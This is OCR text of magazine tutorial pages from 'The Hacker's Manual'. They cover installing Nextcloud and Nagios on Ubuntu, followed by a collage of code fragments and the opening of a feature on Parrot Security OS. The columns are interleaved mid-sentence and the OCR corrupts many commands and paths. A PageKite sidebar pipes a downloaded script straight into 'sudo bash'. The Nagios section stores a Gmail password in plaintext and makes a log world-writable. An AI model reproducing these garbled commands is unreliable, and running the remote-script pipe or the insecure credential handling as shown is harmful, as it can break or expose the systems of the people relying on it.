and accept the use of the self-signed certificate: Since this is the first time you're interacting with
$ a2enmod ssl Nextcloud, you'll be asked to create an admin account.
$ a2ensite default-ssl Enter the username and password for the Nextcloud
When you are done, restart the Apache server to load the administrator in the space provided. Then scroll down and
modules with sudo systemctl restart apache2 . expand the Storage & database pull-down menu to reveal
more options. The data folder is where Nextcloud will house
In the clouds the files shared by the users. Although it'll already be
Now that we’ve laid the groundwork for Nextcloud, let's fetch populated with a location, for security reasons the
and install the server. Head to www.nextcloud.com/install Nextcloud developers advise that it's better to place the
and grab the latest version which is vlO.O.l at present: data directory outside the Nextcloud root directory, such as
$ wget -c https://download.nextcloud.com/server/releases/ /var/www/data.
nextcloud-10.0.1 ,tar.bz2 You're next prompted for several details about the
$ tar xvf nextcloud-10.0.1.tar.bz2 database server. By default Nextcloud uses the SQLite
You can backup
Deflating the archive will create a new directory named database which is adequate for smaller installations.
your entire
nextcloud in the current working directory. Copy the new However, we've already setup the industry-standard MariaDB Nextcloud install to
directory and all of its content to the document root of the which can handle all sorts of loads. Use the textboxes to enter a remote location
Apache server with sudo cp -r nextcloud /var/www/. Then the username and password for the user we created earlier to with something as
hand over the control of the directory to the Apache user manage the nextcloud database. Then press the Finish setup simple as rsync
(www-data) with sudo chown www-data:www-data /var/ button to let Nextcloud connect to the database and create -Aax/var/www/
nextcloud/
www/nextcloud/ -R. the appropriate structure for the Nextcloud installation.
nextcloud-dir-
We’ll install and access Nextcloud from under its own That's it, your Nextcloud server is up and running. You'll
backup_date
directory by creating a configuration file with sudo nano /etc/ now be taken to Nextcloud's dashboard. While you can start
+"%d%m%Y"7.
apache2/sites-available/nextcloud.conf and the following: using the server to upload and download files straight away,
let's take a moment to get the house in order.
Alias /nextcloud /var/www/nextcloud/ For starters, roll-down the menu next to your username in
the top-right corner and click the Personal link. Here you can
<Directory /var/www/nextcloud/> review and change several settings for your account, such as
Options +FollowSymlinks the password and display name. It also lists the groups you
AllowOverride All are part of. If your Nextcloud deployment is going to be used
by multiple people, it's advisable to organise users into
<IfModule mod_dav.c> different groups. To do this, select the Users option from the
Dav off pull-down menu. You can then use the forms on the page to
</IfModule> create groups and users. While adding users, you can also »

The Hacker's Manual | 87


Software
Nextcloud has clients for all the major desktop and mobile
platforms. These clients also help you synchronise folders
from the desktop to your Nextcloud server with ease. Many
Linux distributions such as Arch Linux and OpenSUSE
Tumbleweed include the Nextcloud Linux client in their official
repos. If your distribution doesn't have the Nextcloud client in
its repositories, you can either compile the official client from
source or download and use the client for ownCloud. The
ownCloud client is available in the repositories of virtually all
the popular distributions including Ubuntu.
Once the client is installed, it prompts you for your login
credentials in order to connect to the Nextcloud installation.
After establishing the connection, use the client to create a
local sync folder under your home directory such as /home/
bodhi/Nextcloud. Any files you move into this directory will
automatically be synced to the server. The client's connection
> Nextcloud restrict their storage space and even mark certain users as wizard also asks you whether you'd like to sync everything
hosts clients for administrators of particular groups. from the connected Nextcloud installation or selectively sync
Windows and You're now all set to upload data into your Nextcloud files. After running through the client’s wizard, you can access
Mac OS X on its
server. After you've logged in, you are dropped in the Files it from your desktop's notification area.
website (https://
section. The interface is very intuitive and straightforward. To When collaborating with other users, you’ll appreciate
nextcloud.com/
upload a file, click on the + button and choose Upload from Nextcloud's version control system, which creates backups of
install/#install-
clients) while the drop-down menu. To organise files into folders, click on files before modifying them. These backups are accessible
mobile clients the + button and select the Folder option. If you've uploaded a through the Versions pull-down option corresponding to each
are best fetched file in a format that Nextcloud understands, you can click on file, along with a 'Restore' button to revert to an older version.
from either its name to view and edit the file. Nextcloud can visualise the In addition to files, you can also sync your calendar and
Apple’s App data it houses in different views. For example, click on the address book with your Nextcloud server. Follow the
Store, Google's Files pull-down menu in the top-left corner of the interface, walkthrough to enable the Calendar and Contacts
Play Store or and select the Gallery option. This view helps you view images applications. Once you've enabled both programs, the top-left
the F-Droid
in your cloud by filtering out all other types of content. pull-down menu now includes the Calendar and Contacts
repository.
Another way to upload files to the server is by using the option. Before proceeding further, you need to import your
WebDAV protocol, with which you can access your cloud contacts and calendar from your existing app into your cloud
server from your file manager. If you use Ubuntu, launch the server. Nextcloud supports the popular vCard (.vcf) file
Files file manager and press Ctrl+L to enable the location format and almost every popular email applications, including
area. Here you can point to your Nextcloud server, such as online ones such as Gmail let you export their address books
dav://192.168.3.106/nextcloud/remote.php/webdav. in this format. Similarly, calendars can be imported in the
Once authenticated, the Nextcloud storage is mounted and popular iCal format. Explore your existing mail and
you can interact with it just like a regular folder. calendaring apps and export the VCF and iCal files for your
To share uploaded files, go to the Files section in the web account before moving on.
interface and click the Share button to the right of the In Nextcloud Contacts click on the gears icon. Select
filename. This will bring up a flap where you can specify the Import from the options that are revealed and point to the
users and groups you want to share the file with along with export VCF file. The import process might take some time
other options such as whether you want to give them with a large address book. You can sync these contacts with
permission to modify or further share the file. You can also your desktop and mobile email apps using CardDAV. You can
share with someone who isn't registered with your Nextcloud similarly, import an existing calendar, by clicking on the
server. Simply toggle the Share link checkbox and Nextcloud Gears icon inside the Calendar app. Here again click on the
will display a link to the item that you can share with anybody Import calendar button and point to the exported ICal file.
on the internet. You can also password-protect the link and We've just scratched the surface of what you can do with
set an expiration date. Nextcloud. Follow the walkthrough to flesh out the default
While you can interact with the clcud using the web installation with new applications that will extend the
interface, it's far easier to use one of its official clients. functionality of your personal cloud. ■

Be omnipresent
The real advantage of commercial cloud from the internet. The smarter way is to use a To use PageKite, fire up a terminal and install
services, such as Dropbox, is that you can tunnelling service such as PageKite. It uses a the PageKite software with:
access data stored within them from any Python script to reverse tunnel from your $ curl - s https://pagekite.net/pk/1 sudo bash
computer connected to the internet. However, computer to a subdomain.pagekite.me Now assuming your storage server is running
by default, your Nextcloud storage server will address. The service uses a pay-what-you-want on port 80. put it on the internet with
only be accessible from computers within the model. The minimum payment of $4 (about $ pagekite.py 80 mynextcloudserver.pagekite.me
network it's set up on. But that's not to say that £3.00) gets you 2GB of transfer quota for a That's it. Your private server is now publicly
you can't access it from the internet. Either get a month. Pay more to get more bandwidth for a accessible on https://mynextcloudserver.
static IP or use a dynamic DNS service and then longer duration and the ability to create pagekite.me. Remember to replace
poke holes in your router's firewall to allow traffic additional .pagekite addresses. mynextcloudserver with your own name.

88 | The Hacker's Manual


Nextcloud

Install additional apps

D Application repository 0 Calendar and Contacts


You can extend your default Nextcloud install by adding applications. These two should be the first applications you enable. You'll find them
Bring up the pull-down menu in the top-left of the interface and select listed under the Productivity category. Once enabled, you can use the
the option labelled Apps. By default, you are shown a list that are app’s intuitive interface to add dates, contacts and other details. The
already enabled on your installation. You can browse through this list apps allow you to pull in your existing contacts and calendars, which
and read their descriptions to better understand their functionality. you can then sync with any PIM applications using industry standard
You can also disable any enabled app from this section. formats and protocols (as explained in the tutorial).

External Storage
"smbcllenr is not installed. Mounting of 'SMB / CIFS’, *SMB / CIFS using OC login’ is not possible. Please
ask your system administrator to install It.

Folder name External storage Authentication Configuration Avallab

mayank.n10.biz?gm<

■ GoogleDrtve Google Drive 0 OAuth2 » .............

Grant access

GoogleDf ive |Add storage j»

Amazon S3______________
□ Allow users to mount externA^^^^^H
। P
Google Drive
Global credentials Local
Nextcloud
geekybodhi .......... openstack Object storage
SFTP
webDAV

D External storage 0 File access control


If you use popular public storage services like Dropbox and Google If your Nextcloud install will serve several users, it'll be a good idea to
Drive, you can connect and manage them from Nextcloud with the enable the File access control app. This app is also configurable via
External storage support app. Once enabled, the app creates room the Admin section from where you can define various access control
for itself in the Admin section of the installation. Use the Add storage rules on parameters such as IP address, file size and more. The rules
pull-down menu to select a supported service and enter the are tagged to a group of users on the Nextcloud deployment and
authentication details in the space provided. access is only granted only if the attached rules hold true.

Most Visited v ^Otting Started Add to own Cloud

0 Bookmark manager 0 Automatically tag files


An app that you should enable is Bookmarks. This enables you to For better organisation, you can use the Files automated tagging app
store and manage bookmarks in your Nextcloud server. Launch the which will assign tags to files on its own based on some condition, as
app to store bookmarks directly, or import them from a bookmark file soon as they are uploaded, You can define rule groups for assigning
from your web browser. The app also has a bookmarklet that you can tags in the Workflow section in the Admin section using several
add to your browser’s bookmarks bar. Press the bookmarklet to add different criteria. When a file is uploaded. Nextcloud will compare it
a website to Nextcloud's list of bookmarks. with the defined rules and will tag the file if a matching rule is found.

The Hacker's Manual | 89


Software

Nagios: Monitor
your PC realm
Keep an eye on your network from the comforts of your armchair and the
power of an industrial-level monitoring solution.

dministering a network is an involved task, but it releases/nagios-4.2.1.tar.gz

A needn't be cumbersome. Wouldn't it be great if all of


us could manage our networks from the comforts of

seem like a pipe dream to any admin who's handled calls


$ tar xvf nagios-4.2. l.tar.gz
$ cd nagios-4.2.1/
an armchair just like the Architect in The Matrix? This might You can now compile Nagios with ./configure -with-
nagios-group=nagios-with-command-group=nagcmd
from the helpdesk at 3:00 am and diagnosed the mail server followed by make all and finally install the main application
across the continent in the dead of the night. While it doesn’t along with all the files and scripts for the administration
take much effort to keep an eye on a small network, interface with sudo make install. To help ease the
monitoring and troubleshooting a geographically dispersed configuration, type sudo make install-config I to install the
network is a complicated and time consuming endeavour. sample config files under /usr/local/nagios/etc directory.
Nagios is one of the most popular and extensively used In the same vein, type sudo make install-commandmode / to
network monitoring tool that you can use to streamline the set the correct permissions on the external command
management and monitoring of your network. You can use it directory. You can type make without any arguments for a list
monitor just about all devices and services that have an of all available options. For example, there's sudo make
address and can be contacted via TCP/IP. The tool can install-in.it to install the Nagios init scripts. However since
monitor a variety of attributes ranging from operating system Ubuntu now uses Systemd we'll have to manually create a
parameters such as CPU, disk, and memory usage to the system file with sudo nano /etc/systemd/system/nagios.
status of applications, files, and databases. service with the following content:
[Unit]
Deploy big brother Description=Nagios
Installing Nagios is an involved but rather straightforward BindTo=network.target
process. It's made marginally more complicated by the fact
that the latest version of Nagios isn't yet available in the [Install]
Ubuntu Server repositories. So you'll just grab the tarball for WantedBy=multi-user.target
the latest release from its website and compile it on your own.
Begin by installing all its dependencies with sudo apt [Service]
install build-essential wget unzip openssl libssl-dev libgd2- User=nagios
xpm-dev xinetd apache2 php apache2-utils apache2-mod- Group=nagios
php7.0 php-gd . Then create a user and group for Type=simple
administering Nagios since it isn't a good idea to run server ExecStart=/usr/local/nagios/bin/nagios/usr/local/nagios/etc/
software with superuser privileges: nagios.cfg
$ useradd nagios Save the file and then enable the service with:
$ groupadd nagcmd $ sudo systemctl enable /etc/systemd/system/nagios.service
Now add the Nagios user and the Apache user, www-data, $ sudo systemctl start nagios
to the nagcmd group in order to run commands on Nagios The Nagios server is now up and running.
After making
changes to any through the web interface:
aspect of the $ usermod -a -G nagcmd nagios Plugin services
Nagios server,make $ usermod -a -G nagcmd www-data The Nagios server has an extensive plugin architecture that
it a habit to check
That sets up the build environment for Nagios. Head to you can use to monitor services like DHCP, FTP, HTTP and
the config jration
the Nagios Core download page (https://www.nagios.org/ more. Just like the monitoring server itself, to install the
with sudo/usr/
downloads/core-stay-informed/) and click the Skip to Nagios Plugins, go to its downloads page (https://nagios-
local/nagios/
bin/nagios download page link if you don't want to sign up to receive plugins.org/downloads/) and copy the download link for
-v /usr/local/ emails about new updates. From this page, copy the the current stable release:
nagios/etc/ download link to the latest release and then fetch and $ wget -c http://www.nagios-plugins.org/download/nagios-
nagios.cfg. extract it on the terminal: plugins-2.1.3.tar.gz
$ wget -c https://assets.nagios.com/downloads/nagioscore/ $ tar xvf nagios-plugins-2.1.3.tar.gz

90 | The Hacker's Manual


Nagios
Change into the newly created directory, then configure, ©B Terminal File Edit View Search Terminal Help > Always
compile, and install the plugins with: Running pre-flight check on configuration data...
remember to
$ cd nagios-plugins-2.1.3/ Checking objects...
check the Nagios
Checked 23 services.
$ ./configure -with-nagios-user=nagios -with-nagios- Checked 4 hosts.
configuration,
Checked 2 host groups.
which looks at
group=nagios -with-openssl Checked 0 service groups.
Checked 1 contacts.
Checked 1 contact groups. the definitions
$ make Cheeked 24 coiwands.
Checked S tine periods. for all
$ sudo make install Checked 0 host escalations.
Checked 6 service escalations. components
Before moving further, you should tweak the default Checking for circular paths...
Checked 4 hosts including all
Checked 0 service dependencies
Nagios configuration to specify the directory that'll house the Checked 0 host dependencies hosts and
Checked 5 ttneperlods
configuration for the other computer in the network you want Checking global event handlers... services, before
Checking obsessive compulsive processor commands...
Nagios to monitor. Checking mtsc settings... committing
Open the main Nagios configuration file with sudo nano I Total warnings: 0 the changes by
Total Errors: 0

usr/lccal/nagios/etc/nagios.cfg and scroll down and remove restarting the


Things look okay - No serious problems were detected during the pre-flight check

the # symbol to uncomment the following line:


bodhigubuntu;~$ server.

cfg_dir=/usr/local/nagios/etc/servers
Save and exit the file and the create the specified directory prompts you to setup its password. That's all there is to it.
with sudo mkdir /usr/local/nagios/etc/servers . You should Now restart Apache and the Nagios service:
also take a moment to specify an email address for Nagios to $ sudo service apache2 restart
send notifications to whenever it picks up an issue with one of $ sudo systemctl start nagios
the computers it's monitoring. While this is purely optional it's Then fire up a web browser on any computer on the
a natural extension of having a monitoring server. But for this network and access the administration interface by
to work you'll need a functional email server as well, which is appending /nagios to the domain name or IP address of the
a project in itself. However later in the tutorial we'll use a nifty computer you've setup Nagios on. Assuming the address of
little script that'll let Nagios send notifications via Gmail, the Nagios server is 192.168.3.104, you can access the
which should work nicely for smaller networks. For now, open Nagios administration interface at 192.168.3.104/nagios.
the contacts.cfg file with sudo nano /usr/local/nagios/etc/ You'll be prompted for the login credentials of the Nagios
objects/contacts.cfg and replace the default email with your admin that you've just created.
email address. After authentication you’ll be taken to the Nagios
administration console which is loaded with information. It
Dash to the dashboard and might look daunting at first but it presents all information
The final aspect of the setup process is configuring the in a logical manner and is very intuitive to operate. For
environment for the web-based administration dashboard. starters, head to the Hosts link in the navigation bar on the
Begin by enabling the rewrite and CGI Apache modules with left. Even though you haven't configured any hosts for
sudo a2enmod rewrite && sudo a2enmod cgi. monitoring yet. by default the page will list one machine: the
Now setup Nagios as a virtual host inside Apache by localhost on which Nagiosis installed and running.
copying over the sample configuration file with sudo cp
sample-config/httpd.conf Zetc/apache2/sites-available/ Open for business
nagios4.conf. Give it the right access permissions with sudo The client computers you wish to monitor are known as
chmod 644 Zetc/apache2/sites-available/nagios4.conf before hosts in Nagios parlance. To add a host shift over to that
enabling the new virtual host using sudo a2ensite nagios4. computer (either physically or via SSH) and install Nagios
conf .You should also create the authentication details to Plugins and NRPE with sudo apt install nagios-plugins
login to the administration interface. The command sudo nagios-nrpe-server . NRPE is the Nagios Remote Plugin
htpasswd -c /usr/local/nagios/etc/htpasswd.users Executor which allows you to remotely execute the Nagios
nagiosadmin creates a user named nagiosadmin and plugins on other Linux machines so that you can monitor »

Monitor Windows hosts


If your network has Windows machines in on the NSCIient service to edit its settings. define service {
addition to Linux hosts, you can use Nagios to Switch to the Log On tab and toggle the Allow use generic-service
monitor various services and attributes running service to interact with desktop checkbox. host_name winlO_host
atop these as well. Before you can monitor a When the service is setup on the Windows service_description Uptime
Windows machine, edit the main Nagios core machine, switch to the computer running Nagios check_command check_nt!UPTIME
config file with sudo nano /usr/local/nagios/etc/ to define the Windows host inside the servers }
nagios.cfg and uncomment the following line: directory:
cfg_file=/usr/local/nagios/etc/objects/windows. $ sudo nano /usr/local/nagios/etc/servers/ define service {
cfg. winlO_host.cfg use generic-service
This tells Nagios to look for object definitions host_name winl0_host
for Windows hosts in this file. Now head to www. define host { service_description CPU Load
nsclient.org and download the latest version of use windows-server check_command check_nt!CPULOAD!-l
the Windows monitoring client. Double-click the hostname winlO_host 5,80,90
downloaded executable file and run through the alias Windows 10 Box }
setup to install it. On some Windows installation, address 192.168.3.107 Tnese definitions define the location of the
you'll have to head to Control Panel > } Windows host in the network as well as define
Administrative Tools > Services and double-click the uptime and CPU load services.

The Hacker's Manual | 91


Software
With the configuration file above, Nagios will only monitor
if the host is up or down. You'll have to manually add in blocks
of code for other services you wish to monitor. So for
example, here’s how you ping the host at regular intervals:
define service {
use generic-service
host_name ubuntu_host
service_description PING
check_command check_
ping! 100.0,20%!500.0,60%
}
Similarly, here's how you check on the disks:
define service{
use generic-service
host_name ubuntu_host
service_description Root Partition
>Use the Tactical various metrics on these machine such as the disk space, check_command checkJocal_
Overview option CPU load and more. disk!20%!10%!/
to view a one- Once it’s been installed, you'll have to tweak the NRPE check_period 24x7
page summary
configuration file to acclimatise it to your network. Open the check_freshness 1
of the current
file in a text editor using sudo nano /etc/nagios/nrpe.cfg and contact_groups admins
status of the
find the server_address directive and add the IP address of notificationjnterval 2
monitored hosts
this host, such as server_address=192.168.3.100. Scroll notification_period 24x7
and services and
the Nagios Core further down the file to the allowed_hosts directive, and add notifications_enabled 1
server itself. the IP address of your Nagios server to the comma-delimited )
list, such as allowed_hosts=127.0.0.1,192.168.3.104, This The above service definition block will check the disk
configures NRPE to accept requests from your Nagios server. space of the root partition on the machine and send a Warn
Next up, we’ll specify the filesystem in this configuration alert when the free space is less than 20% and a Critical alert
file to enable Nagios to monitor the disk usage. You can find when the free space goes down 10%. Take a look at the
the location of your root filesystem with the df-h/ command definition in the /usr/local/nagios/etc/objects/localhost.
in a new terminal window. Assuming it's /dev/sda8, scroll cfg file for other definitions for monitoring the host and adapt
down the nrpe.cfg file and look for the command [check_ them as per your requirements.
hdal] directive and make sure it points to your root filesystem When you’re done defining the host and the services you
such as: want to monitor, save the file and reload the Nagios
command[check_hdal]=/usr/lib/nagios/plugins/check_disk configuration with sudo service nagios reload .
-w 20% -c 10% -p Zdev/sda8 It might take a couple of seconds for Nagios to connect
Save the file and bring the changes into effect by restarting with the host. Fire up the browser and bring up the Nagios
NRPE with sudo service nagios-nrpe-server restart. administration interface. When you now click on the Hosts
Once you are done installing and configuring NRPE on the link, the page will list the newly added ubuntuJiost along with
host that you want to monitor, you will have to add the host to localhost. It'll also display the current status of the host and
your Nagios server configuration before it will start you can click on it for further details.
monitoring them. On the Nagios server, create a new There are various ways you can check up on the
configuration file for each of the remote hosts that you configured services for the host. Click on the Services link in
want to monitor under the /servers directory created earlier, the navigation menu on the left to view a list of all services
such as: configured on all the added hosts along with their current
$ sudo vi /usr/local/nagios/etc/serveis/ubuntu_host.cfg status and a brief one-line information. Click on name of the
In this file, you need to define various aspects of the host, service for a detailed -eport on that particular service under a
such as: particular host.
define host { Repeat this section for every Linux computer in your
use linux-server network that you want to monitor with Nagios. Refer to the
host_name ubuntuJiost Monitor Windows hosts box if you wish to keep an eye on the
alias Ubuntu 16.10 Host Windows machines in your network as well.
address 192.168.3.100
check_period 24x7 Receive notifications
notificationjnterval 30 While Nagios automatically keeps an eye on all the hosts
notification_period 24x7 you've given it access to. you'll have to head to the
It's a good idea to
replace the default
contact_groups admins administration dashboard to pick up any errors. A better
Nagios home page } option is to let the monitoring server send you notifications
with the Tactical Here we’ve specified the name and address of the host whenever a computer or service in your network isn’t
Overview page. To functioning properly and requires attention. Nagios can for
along with other aspects such as the time to wait before
do this edit the/
sending out notifications (30 minutes), the period in which example send you an email when a disk utilisation crosses a
usr/local/ragios/
share/index.php the host is monitored (24 hours) and the contact group that’ll certain threshold or a critical service like Samba is down.
file and point $url be notified whenever there are problems with this host. The Usually this requires setting up a dedicated mail server,
to'/nagios/cgi-bin/ Nagios docs (http://bit.ly/LXFnagios) describes the which could be a costly and time consuming affair. If you
taccgi';
various aspects that you can define while setting up a host. don’t mind relying on a public email service, you can use the

92 | The Hacker's Manual


Nagios

Reusable configuration
One of the best features in Nagios is known as manageable, network admins can reuse notifications. The generic-service template
object inheritance. Nagios makes it pretty configuration for pretty much the same works similarly but for individual services rather
straightforward to monitor a large number of advantages. than hosts. The default values defined in the
hosts and services thanks to its ability to use The use keyword in the host and service template file however can be overridden in the
templates that come in handy while setting definition files points to the templates from individual host definition file.
them up. Thanks to templates you can define which the files will inherit objects. The linux- The check_command keyword is also similar
the default values for the host and services server and generic-service templates used in the in function to the use keyword. It points to the
inside a single file rather than having to retype example definitions in the tutorial are defined in commands that are defined in the /usr/local/
them constantly. the/usr/local/nagios/etc/objects/ nagios/etc/objects/commands.cfg file. This
Just like programmers reuse code to templates.cfg file. The linux-server template file contains all the commands for checking
streamline their code and make it more sets defaults for aspects like event handling and various services, such as DHCP. SSH and more.

sendEmail script to ask Nagios to email you notifications actual email address, login id and password for the sender
using a freely available service like Gmail. along with the recipient's email address. If all goes well, the
As usual, first fetch the components the script relies on script will send an email from the sender's email account to
with sudo apt install libio-socket-ssl-perl libnet-ssleay-perl the recipient's email address.
perl. Once these are installed, fetch the script and extract it: Once you've tested the script, you'll need to configure
$ wget http://caspian.dotconf.net/menu/Software/SendEmail/ Nagios to use it to send notification emails via an external
sendEmail-vl .56.tar.gz SMTP server. First up. add the details about Gmail’s SMTP
$ tar xvf sendEmail-vl.56.tar.gz server in the resource.cfg file:
Now change into the extracted folder and copy over the $ sudo nano /usr/local/nagios/etc/resource.cfg
sendEmail script to the folder that houses all the executables
and make it one as well: $USER5$=youremail@gmail.com
$sudocp sendEmail*vl.56/sendEmail /usr/local/bin $USER7$=smtp.gmail.com:587
$ sudo chmod +x /usr/local/bin/sendEmail $USER9$=senders-login-id
It's also a good idea to create a log file for the script to $USER10$=senders-password
write any errors into:
$ touch /var/log/sendEmail Save the file and then edit the command.cfg file and
$ chmod 666 /var/log/sendEmail replace the 'notify-host-by-email' and ‘notify-service-by-email’
If the emails don’t show up in your inbox after you’ve run lines to read:
through this tutorial, check this log file for details with tail -f / # ‘notify-host-by-email’ command definition
var/log/sendEmail. define command{
Note that Gmail has dropped support for SSLv3, so you'll command_name notify-host-by-email
have to tweak the script to get it to work. Open /usr/local/ commandJine /usr/bin/printf “%b” “***“ Notification
bin/sendEmail in a text editor and jump down to line 1906. from Nagios ***** \n\n Notification Type:
Here drop the SSLv3 bit and change the SSLv3 TLSvl line $NOTIFICATIONTYPE$\n Host: $H0STNAME$\n State:
to only read TLSvl. Now save and close the file. $H0STSTATE$\n Address: $HOSTADDRESS$\n Info:
You can now test the script by sending an email from the $H0ST0UTPUT$
CLI in the following format: }
$ sendEmail -v -f [senders-email@gmail.com] -s smtp.gmail.
com:587 -xu [senders-login-id] -xp [Password-for-senders- # ‘notify-service-by-email’ command definition
login] -t [recipient-email-address@gmail.com] -o tls=yes -u define command{
Test email from CLI -m “This really works, eh?l?” command_name notify-service-by-email
Replace the text marked by the [square brackets] with the commandJine /usr/bin/printf “%b” “**“* Notification
from Nagios ***** \n\n Notification Type:
$NOTIFICATIONTYPE$\n Service: $SERVICEDESC$\n
Host: $HOSTALIAS$\n Address: $HOSTADDRESS$\n State:
$SE$
}
Here we've defined the template for the notifications
that'll be sent out for both the host as well as the service.
Double check them before putting them into use by restarting
Nagios with service nagios restart 0.
That's it. If any of the hosts or services within them
misbehave. Nagios will automatically alert you by sending a
notification to the email address specified in the contacts,
cfg file earlier. Your monitoring server is now all set. You can
add more hosts and expand the services it monitors following
the relevant sections of the tutorial. Now put your feet up and
> Use the Map option from the navigation menu on the left sip on that pina colada while Nagios herds your network on
to visualise the hosts on your network. your behalf. ■

The Hacker's Manual | 93


M ACKER’S
‘hash $ i
son । ren

B^B ^vB B.B ^B^^k ■


I
I■■I B fl B BH v B B_ fl B B B B___ t

I I fl fl B I
aprocessable_entity} emigrate $ bundle exec rake db:migrate $
flB^^BB flipp^flik <^pi^Bflfl|
^^B ^^B ^^B

fl Bbhbi B MH
.html B B B B^lse
tec rails generate migration add_priority_to_tasks priorityinteger $ bundle exec rake db:migrate S bundle exec rake dbrmigrate $ bundle exec rails server validate
at, ‘is in the past!’) if due_at < Time.zone.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS = 100 pygame.init() screen = py
ars = for i in range(MAX_STARS): star = [randrange(0,639), randrange(O,479), randrange(l, 16)] stars.append(star) while True: clocktick(30) for event in pygame.
Inumstars = 100; use Time::HiRes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for (Si = 0; Si < Snumstars ; $i++) {$star_x[$i] = rand(80); $s
clear; for (Si = 0; Si < Snumstars ; $i++) {$star_x($i] — $star_s[$i]; if ($star_xf$i] < 0) {$star_x($i] = 80;} Sscreen->addch($star_y[$i], $star_x[$i], “.”);} $screen->refre
lent, lest do gem “rspec-rails”, “~> 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond
nl {redirect_to ©task, notice:'...’} formatjson {head :no_content} else format.html {render action: “edit”} formatjson {render json: ©taskerrors, status: :unprc
ity_to_tasks priority integer $ bundle exec rake db:migrate $ bundle exec rake db’.migrate $ bundle exec rails server validate :due_at_is_in_thejpast def due_at_is_
me.now #!/usr/bin/en python import pygame from random import randrange MAX_STARS - 100 pygame.init() screen = pygame.display.set_mode((640, 480)) c
star = [randrange(0, 639), randrangefO, 479), randrangefl, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type == pyg
tes qw(usleep); use Curses; Sscreen = new Curses; noecho; curs_set(0); for (Si = 0; Si < Snumstars ; $i++) { $star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i]
s ; $i++) { $star_x($i] -= $star_s[$i]; if ($star_x[$i] < 0) { $star_x[$i] = 80;} $screen->addch($star_y[$i], $star_x{$i], “.”);} $screen->refresh; usleep 50000; gem “then
Is”, 2.13.0” $ gem install bundler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond_to do Iformatl if @taskupdate_
’} formatjson {head :no_content} else format.html {render action: “edit”} formatjson {render json: ©taskerrors, status: :unprocessable_entity} $ bundle exec rails
exec rake db:migrate $ bundle exec rake dfrmigrate $ bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in th
rgame from random import randrange MAX_STARS = 100 pygame.initQ screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = 1
s(0, 479), randrange(l, 16)] stars.append(star) while True: clock.tick(30) for event in pygame.event.get(): if event.type — pygame.QUIT: exit(O) #!/usr/bin/perl $nt
new Curses; noecho; curs_set(0); for ($i = 0; $i < Snumstars ; $i++) { $star_x($i] - rand(80); $star_y[$i] - rand(24); $star_s[Si] = rand(4) + 1;} while (1) { Sscreen-
.]; if ($star_x[$i] < 0) {$star_x(Si] = 80;} $screen->addch($star_y($i], $star_x[$i], “.”);} Sscreen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group :deA
ndler $ gem install rails -version=3.2.12 $ rbenv rehash $ rails new todolist -skip-test-unit respond.to do Iformatl if @task.update_attributes(params[:task]) forma'
nt} else format.html {render action: “edit” } formatjson {render json: ©taskerrors, status: :unprocessable_entity} $ bundle exec rails generate migration add_priori1
exec rake db:migrate S bundle exec rails server validate :due_at_is_in_the_past def due_at_is_in_the_past errors.add(:due_at, ‘is in the past!’) if due_at < Time.zon
ndrange MAX_STARS = 100 pygame.init() screen = pygame.display.set_mode((640, 480)) clock = pygame.time.Clock() stars = for i in range(MAXJSTARS): star =
and(star) while True: clocktick(30) for event in pygame.event.get(): if event.type = pygame.QUIT: exit(O) #!/usr/bin/perl Snumstars = 100; use Time::HiRes qw(us
($i = 0; Si < Snumstars ; $i++) { $star_x[$i] = rand(80); $star_y($i] = rand(24); $star_s[$i] = rand(4) + 1;} while (1) { $screen->clear; for (Si = 0; $i < Snumstars ; $i++)
reen->addch($starjy[Si], $star_x($i], “.”);} $screen->refresh; usleep 50000; gem “therubyracer”, “~> 0.11.4” group development, :test do gem “rspec-rails”, "~> 2.13.0
■w w

Hacking
Take your Linux skills to
the next level and beyond
96 Hacker’s Toolkit
Discover the tricks used by hackers
to help keep your systems safe.

104 Linux on a Linx tablet


Get Linux up and running on a low-cost
Windows tablet without the hassle.

108 Multi-boot Linux


Discover the inner workings of Grub and
boot lots of OSes from one PC.

112 Build your own custom Ubuntu distro


Why settle for what the existing
distrubutions have to offer?

116 LTTng monitoring


Get to know what all your programs are up
to by tracing Linux app activity.

120 USB multi-boot


We explain how you can carry multiple
distros on a single USB drive.

The Hacker's Manual | 95


Hacker’s Toolkit
Pretty boy and known pirate Jonni Bidwell shows
how to tame your Parrot. Parrot Security OS, that is...

igh-profile headlines involving the when Linux was still young, there probably complex, in fact, that beyond the usual

H gerund 'hacking' are becoming


increasingly common. Nary a day

millions of dollars worth of internet money (or


weren't that many people trying to attack
it. And that’s largely because there weren't
all that many people using it. Within a
goes by without cybercrooks making off with
couple cf years though, that had all
guidance - "don't click suspect links",
"beware of email attachments" and "keep
your software up to date" - there isn't
much tangible advice we can impart to
"priceless’ NFTs). Which changed. Red Hat and openSUSE regular users.
is a shame because lots of the people enshrined Linux's place in the server So instead we look at the tricks used by
defending against all this computer misuse market. Now it’s all over the cloud, on two hackers on both sides of the force. And
would probably describe themselves as billion phones, while some quirky we’ll show you a new Linux distro in the
hackers, too. We'll continue this debate within, individuals use it form of Parrot Security OS. A veritable
but the point is ransomware, denial of service as a desktop operating system. hackers’ toolkit one might say, that will
attacks and even state-sponsored The computing teach you the ways of pen-testing, network
cyber operations are all on the rise. ecosystem has reconnaissance and exploitation. What
In days gone by Linux users might have become could possibly go wrong?
had reason to be aloof. In the early 90s complex. So
Hacker’s Toolkit

Hack the Planet/Parrot


Get started with a persistent USB install of Parrot Security OS
sually for these hacker-themed features we tend
> The hacker

U to make judicious use of Kali Linux, a distro that’s


jam-packed with pentesting and OS I NT (open
source intelligence) tools. But it’s not the only one - Parrot
OS is equally powerful. And we'd urge you to go and grab
knowledge
website
hackthebox.com
has challenges
the Security edition from https://parrotsec.org and write and labs that
it to a USB stick without delay. Then the games can begin. use Pwnbox, a
virtual, browser­
Before exploring Parrot OS, marvel at the stylish
based edition of
MATE desktop. Besides the colourful background, the
Parrot Security.
Applications menu is organised into categories ranging
with everything from privacy tools to text editors. Most
of the specialist software is in the Pentesting category,
